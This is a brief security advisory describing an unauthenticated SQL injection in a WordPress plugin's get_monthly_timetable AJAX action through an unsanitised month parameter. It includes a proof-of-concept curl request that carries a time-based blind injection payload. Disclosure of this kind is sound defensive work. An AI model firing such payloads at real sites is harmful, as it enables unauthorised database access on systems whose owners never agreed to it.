The plugin does not sanitise and escape the month parameter before using it in a SQL statement via the get_monthly_timetable AJAX action (available to unauthenticated users), leading to an unauthenticated SQL injection
curl 'https://example.com/wp-admin/admin-ajax.php' --data 'action=get_monthly_timetable&month=1 AND (SELECT 6881 FROM (SELECT(SLEEP(5)))iEAn)'